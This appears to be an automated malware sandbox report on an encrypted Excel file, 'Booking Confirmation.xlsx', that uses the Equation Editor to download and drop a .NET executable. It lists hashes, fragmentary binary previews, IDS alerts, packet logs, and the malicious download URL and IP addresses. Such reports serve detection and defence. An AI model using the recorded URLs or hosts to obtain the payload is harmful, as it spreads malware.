                                                                                                                                                    2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.5
                                                                                                                                                    tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.229
                                                                                                                                                    payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.125.191.187
                                                                                                                                                    Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.120
                                                                                                                                                    Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                                    • 103.141.138.122

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                    IE Cache URL:http://workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu/worksdoc/svchost.exe
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........o..........1....j...............................................0..........(....*...0..........r...p..r...p(....(....:.... ..%. .:..a%..^E............O...............}...8....(......-. ..#.%+. .\..%&+..(....(....r...p(....,. -X..%+. d..U%&. *...Za+..r)..p(....(....,. %._%+. ..*%&. ..8KZa8X...rM..p(..... ..Z X,.xa8<....(.... .).8,..........s....(....%.(.....(....*..0...............('...*..0..L........u......:.... ...5 X.5.a%...^E........................z.......g.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1631DAC0.emf
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1099960
                                                                                                                                                    Entropy (8bit):2.0153298378795275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:PXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:VahIFdyiaT2qtXw
                                                                                                                                                    MD5:26D1591924B93332C93C4DAC0950AE17
                                                                                                                                                    SHA1:3E92ECC9EF71E262C4607DED0ED85C0C16FCF18E
                                                                                                                                                    SHA-256:B6FB1C5D8AA5E51E4668270CA5BCDDBE6F5A0DC292F9D82CA429240CDEB47A84
                                                                                                                                                    SHA-512:797D4CDF629E88C835FEC6ED915508221F6CEF3AEFFAFEFD103BFFD683B08F4B422D957DDB94D316E979C7A3C272346734DA1117F25A3AE644CB6EE3B9B6A5B3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................d...........H....N.U............0........N.U........ ....y.Q........ ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.............T...X............2.Q........0...0....{.Q....X.......dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A709BC1.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB9FCECE.jpeg
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48770
                                                                                                                                                    Entropy (8bit):7.801842363879827
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                    MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                    SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                    SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                    SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                    C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):909312
                                                                                                                                                    Entropy (8bit):7.22680766280546
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:E5fo9DEV8CEYZMCu9CJCxlc895/UMDckNbeBM3O9rYCbo46yV5zPvE7MToVZzURg:+o9QeVqjQzlcG5MMDcCbGVGY5LvE7
                                                                                                                                                    MD5:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    SHA1:BAB24B772B269A5D66B26A12501DADE43B80FFDE
                                                                                                                                                    SHA-256:C66456AF669C07CCF8045DEDD1B961E4CAA3541F44BDBCB22B9E842628A10329
                                                                                                                                                    SHA-512:EDD323EB8058BEFFD2ECF87C2F5793A13896F952F5B364AC3C9D2F918165E4671DBEAC76C102AAF13D43B9DFAE18B65B728D72A9ACEB7BCE48842879AE44F3D1
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........o..........1....j...............................................0..........(....*...0..........r...p..r...p(....(....:.... ..%. .:..a%..^E............O...............}...8....(......-. ..#.%+. .\..%&+..(....(....r...p(....,. -X..%+. d..U%&. *...Za+..r)..p(....(....,. %._%+. ..*%&. ..8KZa8X...rM..p(..... ..Z X,.xa8<....(.... .).8,..........s....(....%.(.....(....*..0...............('...*..0..L........u......:.... ...5 X.5.a%...^E........................z.......g.

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:CDFV2 Encrypted
                                                                                                                                                    Entropy (8bit):7.996438735158698
                                                                                                                                                    TrID:
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                    File name:Booking Confirmation.xlsx
                                                                                                                                                    File size:2169344
                                                                                                                                                    MD5:97ee696e60901ec520c93f0e8b29b956
                                                                                                                                                    SHA1:89780a503e1b57b7d224feb43c5db4db60ede9ff
                                                                                                                                                    SHA256:2f2cf9a7f17157fbf03d37450588c9a1396535874097c29d7b12e512295f85ec
                                                                                                                                                    SHA512:2af275f7b9d0a9c563972caf51d3550d9a5e8f6d77302071115baf1ae37d6facc00b2d6b3f03270c2ab5ba7934d40d75dc635be5017ccc65fbcbb3d20893f57d
                                                                                                                                                    SSDEEP:49152:HQIDUI5g3cMwIEfNzZgGBfCReviw1hkmhvdaYf2XmjrM41KtNFvE:1UMg0IuZgwCcvirmhAYfBc41KTFM
                                                                                                                                                    File Content Preview:........................>..................."...................................................................................~.......~...............z.......|.......~...............z.......|.......~......................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Booking Confirmation.xlsx"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:False
                                                                                                                                                    Application Name:unknown
                                                                                                                                                    Encrypted Document:True
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:False
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:64
                                                                                                                                                    Entropy:2.73637206947
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:112
                                                                                                                                                    Entropy:2.7597816111
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:200
                                                                                                                                                    Entropy:3.13335930328
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x6DataSpaces/Version
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:76
                                                                                                                                                    Entropy:2.79079600998
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 2148088
                                                                                                                                                    General
                                                                                                                                                    Stream Path:EncryptedPackage
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:2148088
                                                                                                                                                    Entropy:7.99989686385
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . r c = . . s c . 3 . . . . . . . . . . " L . C G . 4 . . $ ? . . . . . . ! . . e A D . . K . . = ' . . 4 . . . . ' . . . . . Z 9 ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 .
                                                                                                                                                    Data Raw:e7 c6 20 00 00 00 00 00 72 63 3d 0c f9 73 63 9a 33 18 12 1a 1a cd a4 8a a6 8a 8c 22 4c d0 43 47 bc 34 f9 fd 24 3f 99 ef cd 13 7f ed 21 1d e3 65 41 44 09 d2 4b aa 83 3d 27 a9 0c 34 bd 1e 96 ca 27 a9 bf bd 02 bc 5a 39 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08
                                                                                                                                                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                    General
                                                                                                                                                    Stream Path:EncryptionInfo
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:224
                                                                                                                                                    Entropy:4.58731087048
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . p W . . . . . . < . ~ . . e < . . I . . ~ . . . . . . . . . . . . . 8 . . 4 . . . K | F . [ * . ` Q 0 . D . } . G y . . - .
                                                                                                                                                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    11/26/20-09:03:42.330791TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22103.125.191.5
                                                                                                                                                    11/26/20-09:05:07.821191TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 26, 2020 09:03:42.098721981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.330104113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.330276966 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.330790997 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558485985 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558520079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558537006 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558552980 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.558569908 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558594942 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.558605909 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:42.781543016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781585932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781598091 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781610012 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781641960 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781653881 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781672001 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781691074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.781866074 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.008073092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008105993 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008117914 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008130074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008140087 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008151054 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008162022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008173943 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008184910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008198023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008316040 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008335114 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.008457899 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.008502007 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.011636972 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.234186888 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234216928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234227896 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234240055 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234251022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234261990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234289885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234308004 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234323978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234343052 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234360933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234375954 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234391928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234406948 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234421968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234438896 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234453917 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234472990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.236116886 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.236160040 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.237555981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462285995 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462318897 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462332010 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462342978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462353945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462371111 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462383032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462394953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462405920 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462418079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462435961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462446928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462466002 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462481022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462497950 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462513924 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462528944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462559938 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462575912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462718964 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462762117 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462768078 CET4916580192.168.2.22103.125.191.5
